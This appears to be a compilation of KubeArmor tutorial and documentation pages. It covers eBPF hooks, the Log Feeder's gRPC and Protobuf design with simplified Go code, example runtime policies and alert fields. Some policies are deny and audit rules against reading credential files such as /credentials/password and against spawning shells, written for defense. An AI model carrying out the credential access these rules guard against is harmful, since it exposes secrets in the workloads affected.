BPF Hooks: Specific points in the kernel where BPF programs can be attached, such as the entry/exit of syscalls, tracepoints, and LSM hooks.
BPF Maps: Efficient key-value data structures for sharing data. They live in the kernel but are accessed by both kernel BPF programs and user space. KubeArmor uses them to store policy rules, event data (the ring buffer), and identity information.
BPF Verifier: The kernel component that checks BPF programs for safety before loading, ensuring KubeArmor's BPF programs are safe to run.
BPF JIT: Compiles BPF bytecode to native machine code for performance, making KubeArmor's BPF operations fast.
BPF Loader: The user-space library/tool that compiles the C code and loads programs and maps into the kernel. The KubeArmor Daemon uses the cilium/ebpf library as its loader.
In this chapter, you've taken a deeper dive into BPF (eBPF), the powerful kernel technology that forms the backbone of KubeArmor's runtime security capabilities. You learned how eBPF enables KubeArmor to run small, safe, high-performance programs inside the kernel for both observing system events (System Monitor) and actively enforcing security policies at low-level hooks (Runtime Enforcer via BPF-LSM). You saw how BPF Maps are used to share data and store policy rules efficiently in the kernel.
Understanding BPF highlights KubeArmor's modern, efficient approach to container and node security. In the next chapter, we'll bring together all the components we've discussed by looking at the central orchestrator on each node.
Welcome back to the KubeArmor tutorial! In the previous chapters, we've learned how KubeArmor defines security rules using Security Policies, identifies workloads using Container/Node Identity, enforces policies with the Runtime Enforcer, and observes system activity with the System Monitor, all powered by the underlying BPF (eBPF) technology and orchestrated by the KubeArmor Daemon on each node.
We've discussed how KubeArmor can audit or block actions based on policies. But where do you actually see the results of this monitoring and enforcement? How do you know when a policy was violated or when suspicious activity was detected?
This is where the Log Feeder comes in.
Think of the Log Feeder as KubeArmor's reporting and alerting system. Its primary job is to collect all the security-relevant events and telemetry that KubeArmor detects and make them available to you and other systems.
It receives structured information, including:
Security Alerts: Notifications about actions that were audited or blocked because they violated a Security Policy.
System Logs: Telemetry about system activities that KubeArmor is monitoring, even if no specific policy applies (e.g., process executions, file accesses, network connections, depending on visibility settings).
KubeArmor Messages: Internal messages from the KubeArmor Daemon itself (useful for debugging and monitoring KubeArmor's status).
The Log Feeder formats this information into standardized messages (using Protobuf, a language-neutral, platform-neutral, extensible mechanism for serializing structured data) and sends it out over a gRPC interface. gRPC is a high-performance framework for inter-process communication.
This gRPC interface allows various clients to connect to the KubeArmor Daemon on each node and subscribe to streams of these security events in real-time. Tools like karmor log (part of the KubeArmor client tools) connect to this feeder to display events. External systems like Security Information and Event Management (SIEM) platforms can also integrate by writing clients that understand the KubeArmor gRPC format.
You've deployed KubeArmor and applied policies. Now you need to answer questions like:
Was that attempt to read /etc/passwd from the web server container actually blocked?
Is any process on my host nodes trying to access sensitive files like /root/.ssh?
Are my applications spawning unexpected shell processes, even if they aren't explicitly blocked by policy?
Did KubeArmor successfully apply the policies I created?
The Log Feeder provides the answers by giving you a stream of events directly from KubeArmor:
It reports when an action was Blocked by a specific policy, providing details about the workload and the attempted action.
It reports when an action was Audited, showing you potentially suspicious behavior even if it wasn't severe enough to block.
It reports general System Events (logs), giving you visibility into the normal or unusual behavior of processes, file accesses, and network connections on your nodes and within containers.
Without the Log Feeder, KubeArmor would be enforcing policies blindly from a monitoring perspective. You wouldn't have the necessary visibility to understand your security posture, detect attacks (even failed ones), or troubleshoot policy issues.
Use Case Example: You want to see every time someone tries to execute a shell (/bin/sh, /bin/bash) inside any of your containers. You might create an Audit Policy for this. The Log Feeder is how you'll receive the notifications for these audited events.
Event Source: The System Monitor observes kernel events (process execution, file access, etc.). It enriches these events with Container/Node Identity and sends them to the KubeArmor Daemon. The Runtime Enforcer also contributes by confirming if an event was blocked or audited by policy.
Reception by Daemon: The KubeArmor Daemon receives these enriched events.
Formatting (by Feeder): The Daemon passes the event data to the Log Feeder component. The Feeder takes the structured event data and converts it into the predefined Protobuf message format (e.g., the Alert or Log message types defined in protobuf/kubearmor.proto).
Queueing: The Feeder manages internal queues or channels for different types of messages (Alerts, Logs, general KubeArmor Messages). It puts the newly formatted Protobuf message onto the appropriate queue/channel.
gRPC Server: The Feeder runs a gRPC server on a specific port (default 32767).
Client Subscription: External clients connect to this gRPC port and call specific gRPC methods (like WatchAlerts or WatchLogs) to subscribe to event streams.
Event Streaming: When a client subscribes, the Feeder gets a handle to the client's connection. It then continuously reads messages from its internal queues/channels and streams them over the gRPC connection to the connected client.
Here's a simple sequence diagram showing the flow:
This shows how events flow from the kernel, up through the System Monitor and Daemon, are formatted by the Log Feeder, and then streamed out to any connected clients.
The Log Feeder is implemented primarily in KubeArmor/feeder/feeder.go and KubeArmor/feeder/logServer.go, using definitions from protobuf/kubearmor.proto and the generated protobuf/kubearmor_grpc.pb.go.
First, let's look at the Protobuf message structures. These define the schema for the data that gets sent out.
Referencing protobuf/kubearmor.proto:
// Simplified Protobuf definition for an Alert message
message Alert {
int64 Timestamp = 1;
string UpdatedTime = 2;
string ClusterName = 3;
string HostName = 4;
string NamespaceName = 5;
Podowner Owner = 31; // Link to PodOwner struct
string PodName = 6;
string Labels = 29;
string ContainerID = 7;
string ContainerName = 8;
string ContainerImage = 24;
// Process details (host/container PIDs, names, UID)
int32 HostPPID = 27;
int32 HostPID = 9;
int32 PPID = 10;
int32 PID = 11;
int32 UID = 12;
string ParentProcessName = 25;
string ProcessName = 26;
// Policy/Enforcement details
string PolicyName = 13;
string Severity = 14;
string Tags = 15; // Comma separated tags from policy
repeated string ATags = 30; // Tags as a list
string Message = 16; // High-level description
string Type = 17; // e.g., MatchedPolicy, MatchedHostPolicy, SystemEvent
string Source = 18; // e.g., /bin/bash
string Operation = 19; // e.g., Process, File, Network
string Resource = 20; // e.g., /etc/passwd, tcp://1.2.3.4:80
string Data = 21; // Additional data if any
string Enforcer = 28; // e.g., BPFLSM, AppArmor, eBPF Monitor
string Action = 22; // e.g., Allow, Audit, Block
string Result = 23; // e.g., Failed, Passed, Error
// Context details
string Cwd = 32; // Current working directory
string TTY = 33; // TTY information
// Throttling info (for alerts)
int32 MaxAlertsPerSec = 34;
int32 DroppingAlertsInterval = 35;
ExecEvent ExecEvent = 36; // Link to ExecEvent struct
// ... other fields
}
// Simplified Protobuf definition for a Log message (similar but fewer policy fields)
message Log {
int64 Timestamp = 1;
string UpdatedTime = 2;
// ... similar identity/process fields as Alert ...
string Type = 13; // e.g., ContainerLog, HostLog
string Source = 14;
string Operation = 15;
string Resource = 16;
string Data = 17;
string Result = 18; // e.g., Success, Failed
string Cwd = 25;
string TTY = 26;
ExecEvent ExecEvent = 27;
}
// Simplified definitions for nested structs
message Podowner {
string Ref = 1;
string Name = 2;
string Namespace = 3;
}
message ExecEvent {
string ExecID = 1;
string ExecutableName = 2;
}
These Protobuf definitions specify the exact structure and data types for the messages KubeArmor will send, ensuring that clients know exactly what data to expect. The .pb.go and _grpc.pb.go files are automatically generated from this .proto file and provide the Go code for serializing/deserializing these messages and implementing the gRPC service.
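To make the serialization step concrete, here is a small sketch that builds an Alert message and round-trips it through Protobuf encoding, which is essentially what travels over the gRPC stream. It assumes the generated Go bindings are importable as github.com/kubearmor/KubeArmor/protobuf (aliased pb); treat that import path as an assumption for illustration, and note that only fields shown in the definition above are used.
// Sketch: constructing and round-tripping a pb.Alert (import path assumed)
package main

import (
	"fmt"
	"log"

	pb "github.com/kubearmor/KubeArmor/protobuf" // assumed import path for the generated bindings
	"google.golang.org/protobuf/proto"
)

func main() {
	alert := &pb.Alert{
		ClusterName: "default",
		PolicyName:  "ksp-group-1-proc-path-block",
		Severity:    "5",
		Operation:   "Process",
		Source:      "/bin/bash",
		Resource:    "/bin/sleep",
		Action:      "Block",
		Result:      "Permission denied",
	}

	// Serialize to the Protobuf wire format ...
	raw, err := proto.Marshal(alert)
	if err != nil {
		log.Fatalf("marshal failed: %v", err)
	}

	// ... and decode it again, as a gRPC client effectively does on receipt.
	var decoded pb.Alert
	if err := proto.Unmarshal(raw, &decoded); err != nil {
		log.Fatalf("unmarshal failed: %v", err)
	}
	fmt.Printf("policy=%s action=%s resource=%s\n", decoded.PolicyName, decoded.Action, decoded.Resource)
}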
Now, let's look at the Log Feeder implementation in Go.
Referencing KubeArmor/feeder/feeder.go:
// NewFeeder Function (Simplified)
func NewFeeder(node *tp.Node, nodeLock **sync.RWMutex) *Feeder {
fd := &Feeder{}
// Initialize data structures to hold connection channels
fd.EventStructs = &EventStructs{
MsgStructs: make(map[string]EventStruct[pb.Message]),
MsgLock: sync.RWMutex{},
AlertStructs: make(map[string]EventStruct[pb.Alert]),
AlertLock: sync.RWMutex{},
LogStructs: make(map[string]EventStruct[pb.Log]),
LogLock: sync.RWMutex{},
}
// Configure and start the gRPC server
fd.Port = fmt.Sprintf(":%s", cfg.GlobalCfg.GRPC) // Get port from config
listener, err := net.Listen("tcp", fd.Port)
if err != nil {
kg.Errf("Failed to listen a port (%s, %s)", fd.Port, err.Error())
return nil // Handle error
}
fd.Listener = listener
// Create the gRPC server instance
logService := &LogService{
QueueSize: 1000, // Define queue size for client channels
Running: &fd.Running,
EventStructs: fd.EventStructs, // Pass the connection store
}
fd.LogServer = grpc.NewServer(/* ... gRPC server options ... */)
// Register the LogService implementation with the gRPC server
pb.RegisterLogServiceServer(fd.LogServer, logService)
// ... other initialization ...
return fd
}
// ServeLogFeeds Function (Called by the Daemon)
func (fd *BaseFeeder) ServeLogFeeds() {
fd.WgServer.Add(1)
defer fd.WgServer.Done()
// This line blocks forever, serving gRPC requests until Listener.Close() is called
if err := fd.LogServer.Serve(fd.Listener); err != nil {
kg.Print("Terminated the gRPC service")
}
}
// PushLog Function (Called by the Daemon/System Monitor)
func (fd *Feeder) PushLog(log tp.Log) {
// ... code to process the incoming internal log struct (tp.Log) ...
// Convert the internal log struct (tp.Log) into the Protobuf Log or Alert struct (pb.Log/pb.Alert)
// This involves mapping fields like ContainerID, ProcessName, Resource, Action, PolicyName etc.
// The logic checks the type and fields to decide if it's an Alert or a general Log
if log.Type == "MatchedPolicy" || log.Type == "MatchedHostPolicy" || log.Type == "SystemEvent" {
// It's a security alert type of event
pbAlert := pb.Alert{}
// Copy fields from internal log struct to pbAlert struct
pbAlert.Timestamp = log.Timestamp
// ... copy other fields like ContainerID, PolicyName, Action, Resource ...
// Broadcast the pbAlert to all connected clients watching alerts
fd.EventStructs.AlertLock.Lock() // Lock for safe concurrent access
defer fd.EventStructs.AlertLock.Unlock()
for uid := range fd.EventStructs.AlertStructs {
select {
case fd.EventStructs.AlertStructs[uid].Broadcast <- &pbAlert: // Send to client's channel
default:
// If the client's channel is full, the message is dropped
kg.Printf("alert channel busy, alert dropped.")
}
}
} else {
// It's a general system log type of event
pbLog := pb.Log{}
// Copy fields from internal log struct to pbLog struct
pbLog.Timestamp = log.Timestamp
// ... copy other fields like ContainerID, ProcessName, Resource ...
// Broadcast the pbLog to all connected clients watching logs
fd.EventStructs.LogLock.Lock() // Lock for safe concurrent access
defer fd.EventStructs.LogLock.Unlock()
for uid := range fd.EventStructs.LogStructs {
select {
case fd.EventStructs.LogStructs[uid].Broadcast <- &pbLog: // Send to client's channel
default:
// If the client's channel is full, the message is dropped
kg.Printf("log channel busy, log dropped.")
}
}
}
}
Explanation:
NewFeeder: This function, called during Daemon initialization, sets up the data structures (EventStructs) to manage client connections, creates a network listener for the configured gRPC port, and creates and registers the gRPC server (LogServer). It passes a reference to EventStructs and other data to the LogService implementation.
ServeLogFeeds: This function is run as a goroutine by the KubeArmor Daemon. It calls LogServer.Serve(), which makes the gRPC server start listening for incoming client connections and handling gRPC requests.
PushLog: This method is called by the KubeArmor Daemon (specifically, the part that processes events from the System Monitor) whenever a new security event or log needs to be reported. It takes KubeArmor's internal tp.Log structure, converts it into the appropriate Protobuf message (pb.Alert or pb.Log), and then iterates through all registered client connections (stored in EventStructs), broadcasting the message to their respective Go channels (Broadcast). If a client isn't reading fast enough, the message might be dropped because the channel buffer is full.
Now let's see the client-side handling logic within the Log Feeder's gRPC service implementation.
Referencing KubeArmor/feeder/logServer.go:
// LogService Struct (Simplified)
type LogService struct {
QueueSize int // Max size of the channel buffer for each client
EventStructs *EventStructs // Pointer to the feeder's connection store
Running *bool // Pointer to the feeder's running status
}
// WatchAlerts Function (Simplified - gRPC handler)
// This function is called by the gRPC server whenever a client calls the WatchAlerts RPC
func (ls *LogService) WatchAlerts(req *pb.RequestMessage, svr pb.LogService_WatchAlertsServer) error {
// req contains client's request (e.g., filter options)
// svr is the gRPC server stream to send messages back to the client
// Add this client connection to the feeder's connection store
// This creates a new Go channel for this specific client
uid, conn := ls.EventStructs.AddAlertStruct(req.Filter, ls.QueueSize)
kg.Printf("Added a new client (%s, %s) for WatchAlerts", uid, req.Filter)
defer func() {
// This code runs when the client disconnects or an error occurs
close(conn) // Close the channel
ls.EventStructs.RemoveAlertStruct(uid) // Remove from the store
kg.Printf("Deleted the client (%s) for WatchAlerts", uid)
}()
// Loop continuously while KubeArmor is running and the client is connected
for *ls.Running {
select {
case <-svr.Context().Done():
// Client disconnected, exit the loop
return nil
case resp := <-conn:
// A new pb.Alert message arrived on the client's channel (pushed by PushLog)
if err := kl.HandleGRPCErrors(svr.Send(resp)); err != nil {
// Failed to send to the client (e.g., network issue)
kg.Warnf("Failed to send an alert=[%+v] err=[%s]", resp, err.Error())
return err // Exit the loop with an error
}
}
}
return nil // KubeArmor is shutting down, exit gracefully
}
// WatchLogs Function (Simplified - gRPC handler, similar to WatchAlerts)
// This function is called by the gRPC server whenever a client calls the WatchLogs RPC
func (ls *LogService) WatchLogs(req *pb.RequestMessage, svr pb.LogService_WatchLogsServer) error {
// ... Similar logic to WatchAlerts, but uses AddLogStruct, RemoveLogStruct,
// and reads from the LogStructs' Broadcast channel to send pb.Log messages ...
return nil // Simplified
}
Explanation:
LogService: This struct is the concrete implementation of the gRPC service defined in protobuf/kubearmor.proto. It holds references to the feeder's state.
WatchAlerts: This method is a gRPC streaming RPC handler. When a client initiates a WatchAlerts call, this function is executed. It creates a dedicated Go channel (conn) for that client using AddAlertStruct. Then, it enters a for loop. Inside the loop, it waits for either the client to disconnect (<-svr.Context().Done()) or for a new pb.Alert message to appear on the client's dedicated channel (<-conn). When a message arrives, it sends it over the gRPC stream back to the client using svr.Send(resp). This creates the real-time streaming behavior.
WatchLogs: This method is similar to WatchAlerts but handles subscriptions for general system logs (pb.Log messages).
This shows how the Log Feeder's gRPC server manages multiple concurrent client connections, each with its own channel, ensuring that events pushed by PushLog are delivered to all interested subscribers efficiently.
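The channel-per-subscriber pattern described above can be illustrated with a tiny, standalone sketch (not KubeArmor's actual EventStructs code): every subscriber gets its own buffered channel, the broadcast loop performs a non-blocking send to each channel, and slow subscribers simply have messages dropped, just like in PushLog.
// Toy sketch of the channel-per-subscriber broadcast pattern (names are illustrative)
package main

import (
	"fmt"
	"sync"
)

// broker is a toy stand-in for the feeder's EventStructs: it maps a
// subscriber ID to that subscriber's buffered channel.
type broker struct {
	mu   sync.RWMutex
	subs map[string]chan string
}

func newBroker() *broker { return &broker{subs: make(map[string]chan string)} }

// subscribe registers a new client and returns its dedicated channel,
// similar in spirit to AddAlertStruct in the feeder.
func (b *broker) subscribe(id string, queueSize int) chan string {
	b.mu.Lock()
	defer b.mu.Unlock()
	ch := make(chan string, queueSize)
	b.subs[id] = ch
	return ch
}

// broadcast pushes one event to every subscriber, dropping it for any
// subscriber whose buffer is full (the same non-blocking select used in PushLog).
func (b *broker) broadcast(event string) {
	b.mu.RLock()
	defer b.mu.RUnlock()
	for id, ch := range b.subs {
		select {
		case ch <- event:
		default:
			fmt.Printf("subscriber %s busy, event dropped\n", id)
		}
	}
}

func main() {
	b := newBroker()
	c1 := b.subscribe("client-1", 2)
	b.broadcast("alert: /usr/bin/apt blocked")
	fmt.Println(<-c1)
}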
The most common way to connect to the Log Feeder is using the karmor command-line tool provided with KubeArmor.
To watch security alerts:
karmor log --alert
To watch system logs:
karmor log --log
To watch both alerts and logs:
karmor log --alert --log
These commands are simply gRPC clients that connect to the KubeArmor Daemon's Log Feeder port on your nodes (or via the KubeArmor Relay service if configured) and call the WatchAlerts and WatchLogs gRPC methods.
You can also specify filters (e.g., by namespace or policy name) using karmor log options, which the Log Feeder's gRPC handlers can process (although the code snippets above show simplified filter handling).
For integration with other systems, you would write a custom gRPC client application in your preferred language (Go, Python, Java, etc.) using the KubeArmor Protobuf definitions to connect to the feeder and consume the streams.
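As a rough illustration of such a client, the sketch below dials a node's Log Feeder port and streams alerts. It assumes the Go bindings generated from protobuf/kubearmor.proto are importable as github.com/kubearmor/KubeArmor/protobuf and that the standard protoc-generated streaming client (LogServiceClient with a WatchAlerts method taking a RequestMessage) is available; the import path and the "all" filter value are assumptions for illustration.
// Sketch of a custom Go client streaming alerts from the Log Feeder (assumed bindings)
package main

import (
	"context"
	"log"

	pb "github.com/kubearmor/KubeArmor/protobuf" // assumed import path for the generated bindings
	"google.golang.org/grpc"
	"google.golang.org/grpc/credentials/insecure"
)

func main() {
	// Dial the Log Feeder's gRPC port on a node (default 32767).
	conn, err := grpc.Dial("localhost:32767", grpc.WithTransportCredentials(insecure.NewCredentials()))
	if err != nil {
		log.Fatalf("failed to dial log feeder: %v", err)
	}
	defer conn.Close()

	client := pb.NewLogServiceClient(conn)

	// Subscribe to the alert stream; "all" is used here as a catch-all filter.
	stream, err := client.WatchAlerts(context.Background(), &pb.RequestMessage{Filter: "all"})
	if err != nil {
		log.Fatalf("WatchAlerts failed: %v", err)
	}

	// Receive alerts until the stream ends.
	for {
		alert, err := stream.Recv()
		if err != nil {
			log.Fatalf("stream closed: %v", err)
		}
		log.Printf("[%s] %s %s -> %s (policy=%s)",
			alert.Action, alert.Operation, alert.Source, alert.Resource, alert.PolicyName)
	}
}
To recap, these are the Log Feeder's main pieces and where they live in the code base: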
gRPC Server: Listens for incoming client connections and handles RPC calls (feeder/feeder.go). Exposes event streams to external clients.
LogService: Implementation of the gRPC service methods WatchAlerts and WatchLogs (feeder/logServer.go). Manages client connections and streams events.
EventStructs: Internal data structure (maps of channels) holding connections for each client type (feeder/feeder.go). Enables broadcasting events to multiple clients.
Protobuf Definitions: Define the structure of the Alert and Log messages (protobuf/kubearmor.proto). Standardize the output format.
PushLog method: Method on the Feeder called by the Daemon to send new events (feeder/feeder.go). The point of entry for events into the feeder.
The Log Feeder is your essential window into KubeArmor's activity. By collecting enriched security events and telemetry from the System Monitor and Runtime Enforcer, formatting them using Protobuf, and streaming them over a gRPC interface, it provides real-time visibility into policy violations (alerts) and system behavior (logs). Tools like karmor log and integrations with SIEM systems rely on the Log Feeder to deliver crucial security insights from your KubeArmor-protected environment.
This chapter concludes our detailed look into the core components of KubeArmor! You now have a foundational understanding of how KubeArmor defines policies, identifies workloads, enforces rules, monitors system activity using eBPF, orchestrates these actions with the Daemon, and reports everything via the Log Feeder.
Thank you for following this tutorial series! We hope it has provided a clear and beginner-friendly introduction to the fascinating world of KubeArmor.
Here, we demonstrate how to define security policies using our example microservice (multiubuntu).
Process Execution Restriction
Block a specific executable (ksp-group-1-proc-path-block.yaml)
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
name: ksp-group-1-proc-path-block
namespace: multiubuntu
spec:
selector:
matchLabels:
group: group-1
process:
matchPaths:
- path: /bin/sleep
action:
Block
Explanation: The purpose of this policy is to block the execution of '/bin/sleep' in the containers with the 'group-1' label. For this, we define the 'group-1' label in selector -> matchLabels and the specific path ('/bin/sleep') in process -> matchPaths. Also, we put 'Block' as the action of this policy.
Verification: After applying this policy, please get into one of the containers with the 'group-1' label (using "kubectl -n multiubuntu exec -it ubuntu-X-deployment-... -- bash") and run '/bin/sleep'. You will see that /bin/sleep is blocked.
Block accessing specific executable matching labels, In & NotIn operator (ksp-match-expression-in-notin-block-process.yaml)
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
name: ksp-match-expression-in-notin-block-process
namespace: multiubuntu
spec:
severity: 5
message: "block execution of a matching binary name"
selector:
matchExpressions:
- key: label
operator: In
values:
- container=ubuntu-1
- key: label
operator: NotIn
values:
- container=ubuntu-3
process:
matchPaths:
- execname: apt
action:
Block
Explanation: The purpose of this policy is to block the execution of the 'apt' binary in all workloads in the multiubuntu namespace that carry the label container=ubuntu-1. For this, we set the value 'container=ubuntu-1' with the 'In' operator for the key label in selector -> matchExpressions, and the specific execname ('apt') in process -> matchPaths. The second expression (value container=ubuntu-3 with the 'NotIn' operator for the key label) is not strictly necessary: once a value is listed under the 'In' operator, everything else is simply not selected for matching. Also, we put 'Block' as the action of this policy.
Verification: After applying this policy, please exec into any container carrying the label container=ubuntu-1 within the namespace 'multiubuntu' and run 'apt'. You can see that the binary is blocked. Then try the same in other workloads that do not carry the label container=ubuntu-1; there the binary won't be blocked.
Block accessing specific executable matching labels, NotIn operator (ksp-match-expression-notin-block-process.yaml)
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
name: ksp-match-expression-notin-block-process
namespace: multiubuntu
spec:
severity: 5
message: "block execution of a matching binary name"
selector:
matchExpressions:
- key: label
operator: NotIn
values:
- container=ubuntu-1
process:
matchPaths:
- execname: apt
action:
Block
Explanation: The purpose of this policy is to block the execution of the 'apt' binary in all workloads in the multiubuntu namespace that do not carry the label container=ubuntu-1. For this, we set the value 'container=ubuntu-1' with the 'NotIn' operator for the key label in selector -> matchExpressions, and the specific execname ('apt') in process -> matchPaths. Also, we put 'Block' as the action of this policy.
Verification: After applying this policy, please exec into any container carrying the label container=ubuntu-1 within the namespace 'multiubuntu' and run 'apt'. You can see that the binary is not blocked. Then try the same in other workloads that do not carry the label container=ubuntu-1; there the binary will be blocked.
Block all executables in a specific directory (ksp-ubuntu-1-proc-dir-block.yaml)
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
name: ksp-ubuntu-1-proc-dir-block
namespace: multiubuntu
spec:
selector:
matchLabels:
container: ubuntu-1
process:
matchDirectories:
- dir: /sbin/
action:
Block
Explanation: The purpose of this policy is to block all executables in the '/sbin' directory. Since we want to block all executables rather than a specific executable, we use matchDirectories to specify the executables in the '/sbin' directory at once.
Verification: After applying this policy, please get into the container with the 'ubuntu-1' label and run '/sbin/route'. You will see that this command is blocked.
Block all executables in a specific directory and its subdirectories (ksp-ubuntu-2-proc-dir-recursive-block.yaml)
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
name: ksp-ubuntu-2-proc-dir-recursive-block
namespace: multiubuntu
spec:
selector:
matchLabels:
container: ubuntu-2
process:
matchDirectories:
- dir: /usr/
recursive: true
action:
Block
Explanation: As the extension of the previous policy, we want to block all executables in the '/usr' directory and its subdirectories (e.g., '/usr/bin', '/usr/sbin', and '/usr/local/bin'). Thus, we add 'recursive: true' to extend the scope of the policy.
Verification: After applying this policy, please get into the container with the 'ubuntu-2' label and run '/usr/bin/env' or '/usr/bin/whoami'. You will see that those commands are blocked.
Allow specific executables to access certain files only (ksp-ubuntu-3-file-dir-allow-from-source-path.yaml)
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
name: ksp-ubuntu-3-file-dir-allow-from-source-path
namespace: multiubuntu
spec:
severity: 10
message: "a critical directory was accessed"
tags:
- WARNING
selector:
matchLabels:
container: ubuntu-3
file:
matchDirectories:
- dir: /credentials/
fromSource:
- path: /bin/cat
action:
Allow
Explanation: Here, we want the container with the 'ubuntu-3' label to access certain files only through specific executables; any other file access should be blocked. To achieve this goal, we define the scope of this policy using matchDirectories with fromSource and use the 'Allow' action.
Verification: In this policy, we allow /bin/cat to access the files in /credentials only. After applying this policy, please get into the container with the 'ubuntu-3' label and run 'cat /credentials/password'. This command will be allowed with no errors. Now, please run 'cat /etc/hostname'. Then, this command will be blocked since /bin/cat is only allowed to access /credentials/*.
Allow a specific executable to be launched by its owner only (ksp-ubuntu-3-proc-path-owner-allow.yaml)
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
name: ksp-ubuntu-3-proc-path-owner-allow
namespace: multiubuntu
spec:
severity: 7
selector:
matchLabels:
container: ubuntu-3
process:
matchPaths:
- path: /home/user1/hello
ownerOnly: true
matchDirectories:
- dir: /bin/ # required to change root to user1
recursive: true
- dir: /usr/bin/ # used in changing accounts
recursive: true
file:
matchPaths:
- path: /root/.bashrc # used by root
- path: /root/.bash_history # used by root
- path: /home/user1/.profile # used by user1
- path: /home/user1/.bashrc # used by user1
- path: /run/utmp # required to change root to user1
- path: /dev/tty
matchDirectories:
- dir: /etc/ # required to change root to user1 (coarse-grained way)
recursive: true
- dir: /proc/ # required to change root to user1 (coarse-grained way)
recursive: true
action:
Allow
Explanation: This policy aims to allow only a specific user (i.e., user1) to launch its own executable (i.e., hello), meaning that even the root user should not be able to launch /home/user1/hello. For this, we define a security policy with matchPaths and 'ownerOnly: true'.
Verification: For verification, we also allow several directories and files to change users (from 'root' to 'user1') in the policy. After applying this policy, please get into the container with the 'ubuntu-3' label and run '/home/user1/hello' first. This command will be blocked even though you are the 'root' user. Then, please run 'su - user1'. Now, you are the 'user1' user. Please run '/home/user1/hello' again. You will see that it works now.
File Access Restriction
Allow accessing specific files only (ksp-ubuntu-4-file-path-readonly-allow.yaml)
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
name: ksp-ubuntu-4-file-path-readonly-allow
namespace: multiubuntu
spec:
severity: 10
message: "a critical file was accessed"
tags:
- WARNING
selector:
matchLabels:
container: ubuntu-4
process:
matchDirectories:
- dir: /bin/ # used by root
recursive: true
- dir: /usr/bin/ # used by root
recursive: true
file:
matchPaths:
- path: /credentials/password
readOnly: true
- path: /root/.bashrc # used by root
- path: /root/.bash_history # used by root
- path: /dev/tty
matchDirectories:
- dir: /etc/ # used by root (coarse-grained way)
recursive: true
- dir: /proc/ # used by root (coarse-grained way)
recursive: true
action:
Allow
Explanation: The purpose of this policy is to allow the container with the 'ubuntu-4' label to read '/credentials/password' only (the write operation is blocked).
Verification: After applying this policy, please get into the container with the 'ubuntu-4' label and run 'cat /credentials/password'. You can see the contents in the file. Now, please run 'echo "test" >> /credentials/password'. You will see that the write operation will be blocked.
Block all file accesses in a specific directory and its subdirectories (ksp-ubuntu-5-file-dir-recursive-block.yaml)
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
name: ksp-ubuntu-5-file-dir-recursive-block
namespace: multiubuntu
spec:
selector:
matchLabels:
container: ubuntu-5
file:
matchDirectories:
- dir: /credentials/
recursive: true
action:
Block
Explanation: In this policy, we do not want the container with the 'ubuntu-5' label to access any files in the '/credentials' directory and its subdirectories. Thus, we use 'matchDirectories' and 'recursive: true' to define all files in the '/credentials' directory and its subdirectories.
Verification: After applying this policy, please get into the container with the 'ubuntu-5' label and run 'cat /secret.txt'. You will see the contents of /secret.txt. Then, please run 'cat /credentials/password'. This command will be blocked due to the security policy.
Network Operation Restriction
Audit ICMP packets (ksp-ubuntu-5-net-icmp-audit)
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
name: ksp-ubuntu-5-net-icmp-audit
namespace: multiubuntu
spec:
severity: 8
selector:
matchLabels:
container: ubuntu-5
network:
matchProtocols:
- protocol: icmp
action:
Audit
Explanation: We want to audit the sending of ICMP packets from the containers with the 'ubuntu-5' label while allowing packets for the other protocols (e.g., TCP and UDP). For this, we use 'matchProtocols' to define the protocol (i.e., ICMP) that we want to audit.
Verification: After applying this policy, please get into the container with the 'ubuntu-5' label and run 'curl https://kubernetes.io/'. This will work fine and produce no alert. Then, run 'ping 8.8.8.8'. Because the action is Audit rather than Block, the ping still succeeds, but KubeArmor generates an audit alert since the 'ping' command internally uses the ICMP protocol.
Capabilities Restriction
Block Raw Sockets (i.e., non-TCP/UDP packets) (ksp-ubuntu-1-cap-net-raw-block.yaml)
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
name: ksp-ubuntu-1-cap-net-raw-block
namespace: multiubuntu
spec:
severity: 1
selector:
matchLabels:
container: ubuntu-1
capabilities:
matchCapabilities:
- capability: net_raw
action:
Block
Explanation: We want to block any network operations using raw sockets from the containers with the 'ubuntu-1' label, meaning that those containers cannot send non-TCP/UDP packets (e.g., ICMP echo requests or replies) to other containers. To achieve this, we use matchCapabilities and specify the 'CAP_NET_RAW' capability to block raw socket creation inside the containers. Since TCP and UDP traffic uses stream and datagram sockets respectively, those packets can still be sent.
Verification: After applying this policy, please get into the container with the 'ubuntu-1' label and run 'curl https://kubernetes.io/'. This will work fine. Then, run 'ping 8.8.8.8'. You will see 'Operation not permitted' since the 'ping' command internally requires a raw socket to send ICMP packets.
System calls alerting
Alert for all unlink syscalls
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
name: audit-all-unlink
namespace: default
spec:
severity: 3
selector:
matchLabels:
container: ubuntu-1
syscalls:
matchSyscalls:
- syscall:
- unlink
action:
Audit
Alert on all rmdir syscalls targeting anything in the /home/ directory and its sub-directories
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
name: audit-home-rmdir
namespace: default
spec:
selector:
matchLabels:
container: ubuntu-1
syscalls:
matchPaths:
- syscall:
- rmdir
path: /home/
recursive: true
action:
Audit
Native JSON format (this document)
KubeArmor CEF Format (coming soon...)
Container alerts are generated when there is a policy violation or an audit event raised by a policy action. For example, a policy might block the execution of a process. When the execution is blocked by the KubeArmor enforcer, KubeArmor generates an alert event reflecting the policy action. In the case of an Audit action, KubeArmor only generates an alert without actually blocking the action.
The primary difference between container alert events and the telemetry events (showcased above) is that alert events contain additional fields, such as the name of the policy that triggered the alert, and other metadata such as "Tags", "Message", and "Severity" associated with the policy rule.
The fields are self-explanatory and have a similar meaning as in the context of container-based events (explained above).
ClusterName: gives information about the cluster for which the log was generated (example: default)
Operation: gives details about what type of operation happened in the pod (example: File/Process/Network)
ContainerID: information about the container ID from where the log was generated (example: 7aca8d52d35ab7872df6a454ca32339386be)
